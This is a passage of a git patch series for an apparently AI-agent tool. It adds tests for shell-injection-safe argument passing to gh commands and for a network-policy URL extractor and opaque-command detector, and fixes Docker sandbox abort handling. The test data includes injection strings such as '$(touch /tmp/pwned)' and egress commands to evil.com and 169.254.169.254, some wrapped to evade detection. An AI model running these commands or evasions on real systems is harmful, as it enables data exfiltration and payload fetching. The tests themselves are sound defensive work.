index 0daf89a36..38580687b 100644
--- a/test/tools/gh.test.ts
+++ b/test/tools/gh.test.ts
@@ -1,14 +1,19 @@
 import { describe, expect, it, vi } from "vitest";
+import type { Sandbox } from "../../src/sandbox/types.js";
 import { ghIssueTool, ghPrTool, ghRepoTool } from "../../src/tools/gh.js";
 
+const executeGhCommandMock = vi.hoisted(() =>
+	vi.fn((_id: string, args: string[]) => ({
+		content: [{ type: "text", text: `Executed: ${args.join(" ")}` }],
+		isError: false,
+		details: { command: args },
+	})),
+);
+
 // Mock the gh-helpers module to avoid needing actual gh CLI
 vi.mock("../../src/tools/gh-helpers.js", () => ({
 	checkGhCliAvailable: vi.fn().mockResolvedValue(null),
-	executeGhCommand: vi.fn().mockImplementation((_id, cmd) => ({
-		content: [{ type: "text", text: `Executed: ${cmd}` }],
-		isError: false,
-		details: { command: cmd },
-	})),
+	executeGhCommand: executeGhCommandMock,
 }));
 
 describe("gh PR tool", () => {
@@ -151,6 +156,23 @@ describe("gh PR tool", () => {
 				expect(text.text).toContain("name-only");
 			}
 		});
+
+		it("passes metacharacter-heavy PR bodies as one argv entry", async () => {
+			const body = 'body $(touch /tmp/pwned) `whoami` \\ "quoted"';
+
+			await ghPrTool.execute("gh-pr-metachar", {
+				action: "create",
+				title: "Safe title",
+				body,
+			});
+
+			expect(executeGhCommandMock).toHaveBeenLastCalledWith(
+				"gh-pr-create",
+				["pr", "create", "--title", "Safe title", "--body", body],
+				undefined,
+				undefined,
+			);
+		});
 	});
 });
 
@@ -228,6 +250,23 @@ describe("gh Issue tool", () => {
 				expect(text.text).toContain("25");
 			}
 		});
+
+		it("passes metacharacter-heavy issue bodies as one argv entry", async () => {
+			const body = 'issue $(touch /tmp/pwned) `whoami` \\ "quoted"';
+
+			await ghIssueTool.execute("gh-issue-metachar", {
+				action: "create",
+				title: "Safe title",
+				body,
+			});
+
+			expect(executeGhCommandMock).toHaveBeenLastCalledWith(
+				"gh-issue-create",
+				["issue", "create", "--title", "Safe title", "--body", body],
+				undefined,
+				undefined,
+			);
+		});
 	});
 });
 
@@ -274,6 +313,50 @@ describe("gh Repo tool", () => {
 			}
 		});
 
+		it("passes metacharacter-heavy repository names as one argv entry", async () => {
+			const repository = "owner/repo$(touch /tmp/pwned)`whoami`\\";
+
+			await ghRepoTool.execute("gh-repo-metachar", {
+				action: "clone",
+				repository,
+				directory: "target",
+			});
+
+			expect(executeGhCommandMock).toHaveBeenLastCalledWith(
+				"gh-repo-clone",
+				["repo", "clone", repository, "target"],
+				undefined,
+				undefined,
+			);
+		});
+
+		it("passes sandbox context through to gh execution", async () => {
+			const sandbox = {
+				exec: vi.fn(),
+				readFile: vi.fn(),
+				writeFile: vi.fn(),
+				exists: vi.fn(),
+				dispose: vi.fn(),
+			} as unknown as Sandbox;
+
+			await ghRepoTool.execute(
+				"gh-repo-sandbox",
+				{
+					action: "clone",
+					repository: "owner/repo",
+				},
+				undefined,
+				{ sandbox },
+			);
+
+			expect(executeGhCommandMock).toHaveBeenLastCalledWith(
+				"gh-repo-clone",
+				["repo", "clone", "owner/repo"],
+				undefined,
+				sandbox,
+			);
+		});
+
 		it("builds fork command", async () => {
 			const result = await ghRepoTool.execute("gh-repo-4", {
 				action: "fork",
diff --git a/test/utils/url-extractor.test.ts b/test/utils/url-extractor.test.ts
index 39938f388..82022b9f1 100644
--- a/test/utils/url-extractor.test.ts
+++ b/test/utils/url-extractor.test.ts
@@ -3,6 +3,7 @@ import {
 	extractAllUrls,
 	extractUrlsFromShellCommand,
 	extractUrlsFromValue,
+	findOpaqueNetworkShellCommand,
 } from "../../src/utils/url-extractor.js";
 
 describe("extractUrlsFromValue", () => {
@@ -134,6 +135,15 @@ describe("extractUrlsFromShellCommand", () => {
 			]);
 		});
 
+		it("keeps URL operands after curl boolean flags", () => {
+			expect(
+				extractUrlsFromShellCommand("curl -i https://example.com"),
+			).toEqual(["https://example.com"]);
+			expect(
+				extractUrlsFromShellCommand("curl -p https://example.com"),
+			).toEqual(["https://example.com"]);
+		});
+
 		it("extracts URL from curl with flags (includes flag values)", () => {
 			// Note: Flag values like POST are also captured - caller should filter if needed
 			const result = extractUrlsFromShellCommand(
@@ -148,6 +158,12 @@ describe("extractUrlsFromShellCommand", () => {
 			]);
 		});
 
+		it("adds http:// to localhost targets", () => {
+			expect(extractUrlsFromShellCommand("curl localhost:3000/api")).toEqual([
+				"http://localhost:3000/api",
+			]);
+		});
+
 		it("extracts URL from quoted argument", () => {
 			expect(
 				extractUrlsFromShellCommand('curl "https://example.com/path"'),
@@ -182,6 +198,16 @@ describe("extractUrlsFromShellCommand", () => {
 			expect(extractUrlsFromShellCommand("echo hello")).toEqual([]);
 		});
 
+		it("ignores URL literals in non-network commands", () => {
+			expect(
+				extractUrlsFromShellCommand("echo https://example.com | grep example"),
+			).toEqual([]);
+			expect(extractUrlsFromShellCommand("echo https://evil.com")).toEqual([]);
+			expect(
+				extractUrlsFromShellCommand("grep https://evil.com README.md"),
+			).toEqual([]);
+		});
+
 		it("returns empty array for empty string", () => {
 			expect(extractUrlsFromShellCommand("")).toEqual([]);
 		});
@@ -203,6 +229,427 @@ describe("extractUrlsFromShellCommand", () => {
 			expect(extractUrlsFromShellCommand("curl ''")).toEqual([]);
 		});
 	});
+
+	describe("network egress commands", () => {
+		it("extracts netcat host targets", () => {
+			expect(extractUrlsFromShellCommand("nc 169.254.169.254 80")).toEqual([
+				"http://169.254.169.254",
+			]);
+		});
+
+		it("extracts git HTTPS and scp-style remotes", () => {
+			expect(
+				extractUrlsFromShellCommand("git clone https://evil.com/repo.git"),
+			).toContain("https://evil.com/repo.git");
+			expect(
+				extractUrlsFromShellCommand("git svn clone https://evil.com/repo.git"),
+			).toContain("https://evil.com/repo.git");
+			expect(
+				extractUrlsFromShellCommand("git clone git@evil.com:org/repo.git"),
+			).toContain("http://evil.com");
+			expect(
+				extractUrlsFromShellCommand(
+					"git archive --remote=git@evil.com:org/repo.git HEAD",
+				),
+			).toContain("http://evil.com");
+			expect(
+				extractUrlsFromShellCommand(
+					"git submodule add https://evil.com/repo.git vendor/repo",
+				),
+			).toContain("https://evil.com/repo.git");
+			expect(
+				extractUrlsFromShellCommand(
+					"git submodule add -b main --name vendored https://evil.com/repo.git vendor/repo",
+				),
+			).toContain("https://evil.com/repo.git");
+		});
+
+		it("extracts git remotes after global options", () => {
+			expect(
+				extractUrlsFromShellCommand(
+					"git -C /tmp/repo -c core.sshCommand=ssh clone https://evil.com/repo.git",
+				),
+			).toContain("https://evil.com/repo.git");
+		});
+
+		it("extracts git config URL targets", () => {
+			expect(
+				extractUrlsFromShellCommand(
+					"git config remote.origin.url https://evil.com/repo.git",
+				),
+			).toContain("https://evil.com/repo.git");
+			expect(
+				extractUrlsFromShellCommand(
+					'git config --global url."https://evil.com/".insteadOf https://github.com/',
+				),
+			).toContain("https://evil.com/");
+		});
+
+		it("extracts git archive remotes from --remote flags", () => {
+			expect(
+				extractUrlsFromShellCommand(
+					"git archive --remote=https://evil.com/repo.git HEAD",
+				),
+			).toContain("https://evil.com/repo.git");
+			expect(
+				extractUrlsFromShellCommand(
+					"git archive --remote=git@evil.com:org/repo.git HEAD",
+				),
+			).toContain("http://evil.com");
+		});
+
+		it("extracts ssh user host targets without a path separator", () => {
+			expect(extractUrlsFromShellCommand("ssh user@github.com")).toEqual([
+				"http://github.com",
+			]);
+		});
+
+		it("extracts escaped network command names", () => {
+			expect(extractUrlsFromShellCommand("c\\url http://evil.com")).toEqual([
+				"http://evil.com",
+			]);
+		});
+
+		it("extracts targets behind command wrappers", () => {
+			expect(
+				extractUrlsFromShellCommand("busybox wget evil.com/payload"),
+			).toEqual(["http://evil.com/payload"]);
+			expect(extractUrlsFromShellCommand("doas curl evil.com")).toEqual([
+				"http://evil.com",
+			]);
+			expect(extractUrlsFromShellCommand("doas -u root curl evil.com")).toEqual(
+				["http://evil.com"],
+			);
+			expect(extractUrlsFromShellCommand("sudo curl evil.com")).toEqual([
+				"http://evil.com",
+			]);
+			expect(extractUrlsFromShellCommand("time -p curl evil.com")).toEqual([
+				"http://evil.com",
+			]);
+			expect(extractUrlsFromShellCommand("timeout 5 curl evil.com")).toEqual([
+				"http://evil.com",
+			]);
+			expect(
+				extractUrlsFromShellCommand("env FOO=bar nc 169.254.169.254 80"),
+			).toEqual(["http://169.254.169.254"]);
+			expect(
+				extractUrlsFromShellCommand("exec bash -c 'curl evil.com'"),
+			).toEqual(["http://evil.com"]);
+			expect(
+				extractUrlsFromShellCommand("exec -a worker bash -c 'curl evil.com'"),
+			).toEqual(["http://evil.com"]);
+			expect(extractUrlsFromShellCommand("xargs curl evil.com")).toEqual([
+				"http://evil.com",
+			]);
+		});
+
+		it("extracts targets from find exec commands", () => {
+			expect(
+				extractUrlsFromShellCommand("find . -exec curl evil.com \\;"),
+			).toEqual(["http://evil.com"]);
+		});
+
+		it("extracts targets inside shell -c wrappers", () => {
+			expect(
+				extractUrlsFromShellCommand(
+					'bash -c "curl evil.com && ssh user@github.com"',
+				),
+			).toEqual(["http://evil.com", "http://github.com"]);
+			expect(
+				extractUrlsFromShellCommand("bash -lc 'nc 169.254.169.254 80'"),
+			).toEqual(["http://169.254.169.254"]);
+			expect(extractUrlsFromShellCommand("bash -ce 'curl evil.com'")).toEqual([
+				"http://evil.com",
+			]);
+			expect(extractUrlsFromShellCommand("bash -c'curl evil.com'")).toEqual([
+				"http://evil.com",
+			]);
+			expect(extractUrlsFromShellCommand("bash -lc'curl evil.com'")).toEqual([
+				"http://evil.com",
+			]);
+			expect(
+				extractUrlsFromShellCommand("bash -lic 'ssh user@github.com'"),
+			).toEqual(["http://github.com"]);
+			expect(
+				extractUrlsFromShellCommand("bash --command 'curl evil.com'"),
+			).toEqual(["http://evil.com"]);
+			expect(
+				extractUrlsFromShellCommand("dash -c 'wget evil.com/payload'"),
+			).toEqual(["http://evil.com/payload"]);
+			expect(
+				extractUrlsFromShellCommand(
+					"bash -rcfile /tmp/bashrc -c 'curl evil.com'",
+				),
+			).toEqual(["http://evil.com"]);
+			expect(
+				extractUrlsFromShellCommand("bash -o pipefail -c 'curl evil.com'"),
+			).toEqual(["http://evil.com"]);
+			expect(
+				extractUrlsFromShellCommand("bash -norc -c 'curl evil.com'"),
+			).toEqual(["http://evil.com"]);
+		});
+
+		it("extracts targets inside command substitutions", () => {
+			expect(
+				extractUrlsFromShellCommand(
+					"echo $(curl evil.com) $(ssh user@github.com)",
+				),
+			).toEqual(["http://evil.com", "http://github.com"]);
+			expect(extractUrlsFromShellCommand("echo $(curl evil.com)")).toEqual([
+				"http://evil.com",
+			]);
+			expect(
+				extractUrlsFromShellCommand("printf '%s' `wget evil.com/payload`"),
+			).toEqual(["http://evil.com/payload"]);
+		});
+
+		it("extracts targets inside subshell groups", () => {
+			expect(extractUrlsFromShellCommand("( curl evil.com )")).toEqual([
+				"http://evil.com",
+			]);
+			expect(extractUrlsFromShellCommand("echo ok\n( curl evil.com )")).toEqual(
+				["http://evil.com"],
+			);
+			expect(
+				extractUrlsFromShellCommand("echo ok && ( ssh user@github.com )"),
+			).toEqual(["http://github.com"]);
+		});
+
+		it("extracts targets inside process substitutions", () => {
+			expect(extractUrlsFromShellCommand("cat <(curl evil.com)")).toEqual([
+				"http://evil.com",
+			]);
+		});
+
+		it("keeps bracketed IPv6 URL hosts intact", () => {
+			expect(extractUrlsFromShellCommand("curl http://[::1]")).toEqual([
+				"http://[::1]",
+			]);
+		});
+	});
+
+	describe("findOpaqueNetworkShellCommand", () => {
+		it("flags network commands without a statically visible host", () => {
+			expect(findOpaqueNetworkShellCommand("git fetch origin")).toBe(
+				"git fetch origin",
+			);
+			expect(
+				findOpaqueNetworkShellCommand("git fetch origin https://github.com"),
+			).toBe("git fetch origin https://github.com");
+			expect(
+				findOpaqueNetworkShellCommand("git remote add origin $REMOTE"),
+			).toBe("git remote add origin $REMOTE");
+			expect(findOpaqueNetworkShellCommand("sudo git fetch origin")).toBe(
+				"git fetch origin",
+			);
+			expect(findOpaqueNetworkShellCommand("busybox wget $TARGET")).toBe(
+				"wget $TARGET",
+			);
+			expect(findOpaqueNetworkShellCommand("doas curl $TARGET")).toBe(
+				"curl $TARGET",
+			);
+			expect(findOpaqueNetworkShellCommand("doas -u root curl $TARGET")).toBe(
+				"curl $TARGET",
+			);
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git -C /tmp/repo -c foo.bar=baz fetch origin",
+				),
+			).toBe("git -C /tmp/repo -c foo.bar=baz fetch origin");
+			expect(findOpaqueNetworkShellCommand("git lfs fetch origin")).toBe(
+				"git lfs fetch origin",
+			);
+			expect(findOpaqueNetworkShellCommand("nc $TARGET 80")).toBe(
+				"nc $TARGET 80",
+			);
+			expect(
+				findOpaqueNetworkShellCommand("nc $TARGET https://github.com"),
+			).toBe("nc $TARGET https://github.com");
+			expect(findOpaqueNetworkShellCommand("env nc $TARGET 80")).toBe(
+				"nc $TARGET 80",
+			);
+			expect(findOpaqueNetworkShellCommand("time -p curl $TARGET")).toBe(
+				"curl $TARGET",
+			);
+			expect(findOpaqueNetworkShellCommand("timeout 5 curl $TARGET")).toBe(
+				"curl $TARGET",
+			);
+			expect(findOpaqueNetworkShellCommand('bash -c "git fetch origin"')).toBe(
+				"git fetch origin",
+			);
+			expect(findOpaqueNetworkShellCommand("bash -ce 'curl $TARGET'")).toBe(
+				"curl $TARGET",
+			);
+			expect(findOpaqueNetworkShellCommand("bash -c'git fetch origin'")).toBe(
+				"git fetch origin",
+			);
+			expect(
+				findOpaqueNetworkShellCommand("bash -lic 'git fetch origin'"),
+			).toBe("git fetch origin");
+			expect(
+				findOpaqueNetworkShellCommand("bash --command 'git fetch origin'"),
+			).toBe("git fetch origin");
+			expect(findOpaqueNetworkShellCommand("dash -c 'git fetch origin'")).toBe(
+				"git fetch origin",
+			);
+			expect(
+				findOpaqueNetworkShellCommand(
+					"bash -rcfile /tmp/bashrc -c 'git fetch origin'",
+				),
+			).toBe("git fetch origin");
+			expect(
+				findOpaqueNetworkShellCommand("bash -o pipefail -c 'git fetch origin'"),
+			).toBe("git fetch origin");
+			expect(
+				findOpaqueNetworkShellCommand("bash -norc -c 'git fetch origin'"),
+			).toBe("git fetch origin");
+			expect(
+				findOpaqueNetworkShellCommand("exec bash -c 'git fetch origin'"),
+			).toBe("git fetch origin");
+		});
+
+		it("ignores local git archive commands without remote targets", () => {
+			expect(findOpaqueNetworkShellCommand("git archive HEAD")).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git archive --format=tar HEAD"),
+			).toBeNull();
+		});
+
+		it("ignores local git remote bookkeeping commands", () => {
+			expect(findOpaqueNetworkShellCommand("git remote")).toBeNull();
+			expect(findOpaqueNetworkShellCommand("git remote -v")).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git remote remove origin"),
+			).toBeNull();
+			expect(findOpaqueNetworkShellCommand("git remote rm origin")).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git remote rename origin upstream"),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git remote get-url origin"),
+			).toBeNull();
+		});
+
+		it("ignores local git config reads", () => {
+			expect(
+				findOpaqueNetworkShellCommand("git config --get remote.origin.url"),
+			).toBeNull();
+		});
+
+		it("ignores local git submodule bookkeeping commands", () => {
+			expect(findOpaqueNetworkShellCommand("git submodule init")).toBeNull();
+			expect(findOpaqueNetworkShellCommand("git submodule sync")).toBeNull();
+		});
+
+		it("ignores network commands with extracted targets", () => {
+			expect(findOpaqueNetworkShellCommand("nc 169.254.169.254 80")).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git clone -b main https://example.com/repo target-dir",
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git clone https://example.com/repo"),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git remote add origin https://example.com/repo.git",
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git remote set-url origin https://example.com/repo.git",
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git config remote.origin.url https://example.com/repo.git",
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					'git config --global url."https://example.com/".insteadOf https://github.com/',
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git archive --remote=https://example.com/repo.git HEAD",
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand(
+					"git archive --remote=git@example.com:org/repo.git HEAD",
+				),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("curl https://example.com ./out"),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("curl -i https://example.com"),
+			).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("curl -p https://example.com"),
+			).toBeNull();
+			expect(findOpaqueNetworkShellCommand("ssh user@github.com")).toBeNull();
+			expect(findOpaqueNetworkShellCommand("command -v curl")).toBeNull();
+		});
+
+		it("flags opaque targets inside command substitutions", () => {
+			expect(findOpaqueNetworkShellCommand("echo $(curl $TARGET)")).toBe(
+				"curl $TARGET",
+			);
+			expect(
+				findOpaqueNetworkShellCommand("curl https://example.com $TARGET"),
+			).toBe("curl https://example.com $TARGET");
+		});
+
+		it("flags opaque git config URL assignments", () => {
+			expect(
+				findOpaqueNetworkShellCommand("git config remote.origin.url $REMOTE"),
+			).toBe("git config remote.origin.url $REMOTE");
+			expect(
+				findOpaqueNetworkShellCommand(
+					'git config url."$REMOTE".insteadOf https://github.com/',
+				),
+			).toBe("git config url.$REMOTE.insteadOf https://github.com/");
+		});
+
+		it("flags opaque targets behind xargs and find exec prefixes", () => {
+			expect(findOpaqueNetworkShellCommand("xargs curl $TARGET")).toBe(
+				"curl $TARGET",
+			);
+			expect(
+				findOpaqueNetworkShellCommand("find . -exec curl $TARGET \\;"),
+			).toBe("curl $TARGET");
+		});
+
+		it("flags opaque targets inside subshell groups", () => {
+			expect(findOpaqueNetworkShellCommand("( curl $TARGET )")).toBe(
+				"curl $TARGET",
+			);
+		});
+
+		it("flags opaque targets inside process substitutions", () => {
+			expect(findOpaqueNetworkShellCommand("cat <(curl $TARGET)")).toBe(
+				"curl $TARGET",
+			);
+		});
+
+		it("ignores local git clone targets", () => {
+			expect(findOpaqueNetworkShellCommand("git clone ./repo")).toBeNull();
+			expect(findOpaqueNetworkShellCommand("git clone /tmp/repo")).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git clone file:///tmp/repo"),
+			).toBeNull();
+		});
+
+		it("ignores local git archive commands without remotes", () => {
+			expect(findOpaqueNetworkShellCommand("git archive HEAD")).toBeNull();
+			expect(
+				findOpaqueNetworkShellCommand("git archive --format=tar v1.0"),
+			).toBeNull();
+		});
+	});
 });
 
 describe("extractAllUrls", () => {

From 610758ac5a70990a23a50a0f03bf748bbf75fb73 Mon Sep 17 00:00:00 2001
From: Cursor Agent <cursoragent@cursor.com>
Date: Fri, 12 Jun 2026 00:07:13 +0000
Subject: [PATCH 2/4] fix: forward docker sandbox aborts

---
 src/sandbox/docker-sandbox.ts       |  92 +++++++++++++++++++++++-
 test/sandbox/docker-sandbox.test.ts | 105 +++++++++++++++++++++++++++-
 2 files changed, 194 insertions(+), 3 deletions(-)

diff --git a/src/sandbox/docker-sandbox.ts b/src/sandbox/docker-sandbox.ts
index 7f0c7fa46..e32f49bd8 100644
--- a/src/sandbox/docker-sandbox.ts
+++ b/src/sandbox/docker-sandbox.ts
@@ -68,8 +68,14 @@ const logger = createLogger("sandbox:docker");
 
 const execAsync = promisify(exec);
 const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024;
+const DOCKER_ABORT_MARKER_ENV = "MAESTRO_DOCKER_ABORT_MARKER";
 const DOCKER_ABORTABLE_EXEC_WRAPPER = `
 child_pid=""
+cleanup() {
+	if [ -n "$${DOCKER_ABORT_MARKER_ENV}" ]; then
+		rm -f "$${DOCKER_ABORT_MARKER_ENV}"
+	fi
+}
 on_signal() {
 	if [ -n "$child_pid" ]; then
 		kill -TERM -- "-$child_pid" 2>/dev/null || kill -TERM "$child_pid" 2>/dev/null || true
@@ -77,6 +83,7 @@ on_signal() {
 	fi
 	exit 143
 }
+trap cleanup EXIT
 trap on_signal TERM INT HUP
 if command -v setsid >/dev/null 2>&1; then
 	setsid "$@" &
@@ -84,6 +91,9 @@ else
 	"$@" &
 fi
 child_pid=$!
+if [ -n "$${DOCKER_ABORT_MARKER_ENV}" ]; then
+	printf '%s\n' "$child_pid" > "$${DOCKER_ABORT_MARKER_ENV}"
+fi
 wait "$child_pid"
 `.trim();
 
@@ -127,6 +137,53 @@ export class DockerSandbox implements Sandbox {
 		return this.containerId;
 	}
 
+	private async killAbortableExec(
+		containerId: string,
+		abortMarkerPath: string,
+	): Promise<void> {
+		const killScript = [
+			`marker_path="${abortMarkerPath}"`,
+			"for _ in 1 2 3 4 5 6 7 8 9 10; do",
+			'\tif [ -f "$marker_path" ]; then',
+			"\t\tbreak",
+			"\tfi",
+			"\tsleep 0.1",
+			"done",
+			'if [ -f "$marker_path" ]; then',
+			'\tchild_pid=$(cat "$marker_path")',
+			'\tkill -TERM -- "-$child_pid" 2>/dev/null || kill -TERM "$child_pid" 2>/dev/null || true',
+			"fi",
+		].join("\n");
+
+		await new Promise<void>((resolve) => {
+			const killChild = spawn(
+				"docker",
+				["exec", containerId, "sh", "-lc", killScript],
+				{
+					stdio: "ignore",
+				},
+			);
+			killChild.on("close", (code) => {
+				if (code && code !== 0) {
+					logger.debug("Docker abort cleanup exited non-zero", {
+						containerId,
+						abortMarkerPath,
+						exitCode: code,
+					});
+				}
+				resolve();
+			});
+			killChild.on("error", (error) => {
+				logger.debug("Failed to forward abort to docker exec", {
+					containerId,
+					abortMarkerPath,
+					error: error instanceof Error ? error.message : String(error),
+				});
+				resolve();
+			});
+		});
+	}
+
 	async exec(
 		command: string,
 		cwd?: string,
@@ -135,6 +192,14 @@ export class DockerSandbox implements Sandbox {
 	): Promise<ExecResult> {
 		const id = await this.ensureContainer();
 
+		if (signal) {
+			return this.execWithArgs("sh", ["-c", command], {
+				cwd,
+				env,
+				signal,
+			});
+		}
+
 		let dockerCmd = "docker exec";
 		if (cwd) {
 			dockerCmd += ` -w "${cwd}"`;
@@ -171,6 +236,9 @@ export class DockerSandbox implements Sandbox {
 		try {
 			const id = await this.ensureContainer();
 			const dockerArgs = ["exec"];
+			const abortMarkerPath = options.signal
+				? `/tmp/maestro-docker-abort-${randomUUID()}.pid`
+				: null;
 			if (options.cwd) {
 				dockerArgs.push("-w", options.cwd);
 			}
@@ -179,6 +247,9 @@ export class DockerSandbox implements Sandbox {
 					dockerArgs.push("-e", `${key}=${value}`);
 				}
 			}
+			if (abortMarkerPath) {
+				dockerArgs.push("-e", `${DOCKER_ABORT_MARKER_ENV}=${abortMarkerPath}`);
+			}
 			if (options.signal) {
 				dockerArgs.push(
 					id,
@@ -195,12 +266,29 @@ export class DockerSandbox implements Sandbox {
 
 			return await new Promise<ExecResult>((resolve, reject) => {
 				const child = spawn("docker", dockerArgs, {
-					signal: options.signal,
 					stdio: ["ignore", "pipe", "pipe"],
 				});
 				const maxBuffer = options.maxBuffer ?? EXEC_WITH_ARGS_MAX_BUFFER;
 				const stdoutCapture = createOutputCapture();
 				const stderrCapture = createOutputCapture();
+				let abortForwarded = false;
+				const forwardAbort = (): void => {
+					if (!abortMarkerPath || abortForwarded) {
+						return;
+					}
+					abortForwarded = true;
+					void this.killAbortableExec(id, abortMarkerPath);
+				};
+				const cleanupAbort = (): void => {
+					options.signal?.removeEventListener("abort", forwardAbort);
+				};
+
+				options.signal?.addEventListener("abort", forwardAbort, {
+					once: true,
+				});
+				if (options.signal?.aborted) {
+					forwardAbort();
+				}
 
 				child.stdout?.on("data", (data: Buffer) => {
 					appendCapturedOutput(stdoutCapture, data, maxBuffer);
@@ -209,6 +297,7 @@ export class DockerSandbox implements Sandbox {
 					appendCapturedOutput(stderrCapture, data, maxBuffer);
 				});
 				child.on("close", (code) => {
+					cleanupAbort();
 					resolve({
 						stdout: finalizeCapturedOutput(stdoutCapture),
 						stderr: finalizeCapturedOutput(stderrCapture),
@@ -216,6 +305,7 @@ export class DockerSandbox implements Sandbox {
 					});
 				});
 				child.on("error", (error) => {
+					cleanupAbort();
 					const execError = error as Error & {
 						stdout?: string;
 						stderr?: string;
diff --git a/test/sandbox/docker-sandbox.test.ts b/test/sandbox/docker-sandbox.test.ts
index 486e23e68..0009c001f 100644
--- a/test/sandbox/docker-sandbox.test.ts
+++ b/test/sandbox/docker-sandbox.test.ts
@@ -13,12 +13,14 @@ import { DockerSandbox } from "../../src/sandbox/docker-sandbox.js";
 type MockChildProcess = EventEmitter & {
 	stdout: EventEmitter;
 	stderr: EventEmitter;
+	kill: ReturnType<typeof vi.fn>;
 };
 
 function createMockChildProcess(): MockChildProcess {
 	const child = new EventEmitter() as MockChildProcess;
 	child.stdout = new EventEmitter();
 	child.stderr = new EventEmitter();
+	child.kill = vi.fn();
 	return child;
 }
 
@@ -46,7 +48,6 @@ describe("DockerSandbox", () => {
 			"docker",
 			["exec", "container-id", "gh", "api"],
 			{
-				signal: undefined,
 				stdio: ["ignore", "pipe", "pipe"],
 			},
 		);
@@ -77,7 +78,6 @@ describe("DockerSandbox", () => {
 			"docker",
 			["exec", "container-123", "gh", "pr", "view", "1"],
 			{
-				signal: undefined,
 				stdio: ["ignore", "pipe", "pipe"],
 			},
 		);
@@ -131,6 +131,10 @@ describe("DockerSandbox", () => {
 			"docker",
 			[
 				"exec",
+				"-e",
+				expect.stringMatching(
+					/^MAESTRO_DOCKER_ABORT_MARKER=\/tmp\/maestro-docker-abort-[0-9a-f-]+\.pid$/,
+				),
 				"container-789",
 				"sh",
 				"-lc",
@@ -141,8 +145,105 @@ describe("DockerSandbox", () => {
 				"clone",
 				"owner/repo",
 			],
+			{
+				stdio: ["ignore", "pipe", "pipe"],
+			},
+		);
+	});
+
+	it("forwards aborts to the in-container process group", async () => {
+		const child = createMockChildProcess();
+		const abortChild = createMockChildProcess();
+		childProcessMock.spawn
+			.mockReturnValueOnce(child)
+			.mockReturnValueOnce(abortChild);
+		const sandbox = new DockerSandbox();
+		(sandbox as unknown as { containerId: string | null }).containerId =
+			"container-abort";
+		const controller = new AbortController();
+
+		const promise = sandbox.execWithArgs(
+			"gh",
+			["repo", "clone", "owner/repo"],
 			{
 				signal: controller.signal,
+			},
+		);
+		await Promise.resolve();
+		controller.abort();
+		await Promise.resolve();
+		abortChild.emit("close", 0);
+		child.stderr.emit("data", Buffer.from("terminated"));
+		child.emit("close", 143);
+
+		await expect(promise).resolves.toEqual({
+			stdout: "",
+			stderr: "terminated",
+			exitCode: 143,
+		});
+		expect(childProcessMock.spawn).toHaveBeenNthCalledWith(
+			2,
+			"docker",
+			[
+				"exec",
+				"container-abort",
+				"sh",
+				"-lc",
+				expect.stringContaining('kill -TERM -- "-$child_pid"'),
+			],
+			{
+				stdio: "ignore",
+			},
+		);
+	});
+
+	it("routes abortable exec through execWithArgs so container cleanup can run", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+		const sandbox = new DockerSandbox();
+		(sandbox as unknown as { containerId: string | null }).containerId =
+			"container-exec";
+		const controller = new AbortController();
+
+		const promise = sandbox.exec(
+			'printf "%s" "hello"',
+			"/workspace",
+			{ FOO: "bar" },
+			controller.signal,
+		);
+		await Promise.resolve();
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("hello"));
+		child.emit("close", 0);
+
+		await expect(promise).resolves.toEqual({
+			stdout: "hello",
+			stderr: "",
+			exitCode: 0,
+		});
+		expect(childProcessMock.exec).not.toHaveBeenCalled();
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			"docker",
+			[
+				"exec",
+				"-w",
+				"/workspace",
+				"-e",
+				"FOO=bar",
+				"-e",
+				expect.stringMatching(
+					/^MAESTRO_DOCKER_ABORT_MARKER=\/tmp\/maestro-docker-abort-[0-9a-f-]+\.pid$/,
+				),
+				"container-exec",
+				"sh",
+				"-lc",
+				expect.stringContaining("trap on_signal TERM INT HUP"),
+				"sh",
+				"sh",
+				"-c",
+				'printf "%s" "hello"',
+			],
+			{
 				stdio: ["ignore", "pipe", "pipe"],
 			},
 		);

From cef6e3b80eb355fa214a941a9463447041d13244 Mon Sep 17 00:00:00 2001
From: Jonathan Haas <jonathan@haas.holdings>
Date: Sun, 14 Jun 2026 09:15:49 -0700
Subject: [PATCH 3/4] fix(safety): scan bash command strings for mid-string
 URLs in network policy

Restore the recursive URL scan over the full bash args (including the
command string) alongside the bash-token aware extractor. The
token-aware path alone misses URLs embedded mid-string in shell
arguments (e.g. curl "see https://... here", echo "https://...",
heredocs), which let enterprise network policy be bypassed. Union both
scans so neither path can be evaded independently.

Addresses Codex P1 finding on PR #781.
---
 .../validators/network-policy-validator.ts    | 14 ++++-
 test/safety/network-policy-validator.test.ts  | 56 +++++++++++++++++--
 2 files changed, 63 insertions(+), 7 deletions(-)

diff --git a/src/safety/validators/network-policy-validator.ts b/src/safety/validators/network-policy-validator.ts
index d642a548e..b5c09e660 100644
--- a/src/safety/validators/network-policy-validator.ts
+++ b/src/safety/validators/network-policy-validator.ts
@@ -66,12 +66,20 @@ export function extractPolicyUrls(context: ActionApprovalContext): string[] {
 	if (!args) return [];
 
 	if (context.toolName === "bash" || context.toolName === "background_tasks") {
-		const { command, ...nonCommandArgs } = args;
-		const urls = extractUrlsFromValue(nonCommandArgs);
+		// Run both the bash-token aware extractor (which understands curl/wget
+		// argument structure, wrappers, command substitutions, etc.) AND a
+		// recursive substring scan over the full args (including the command
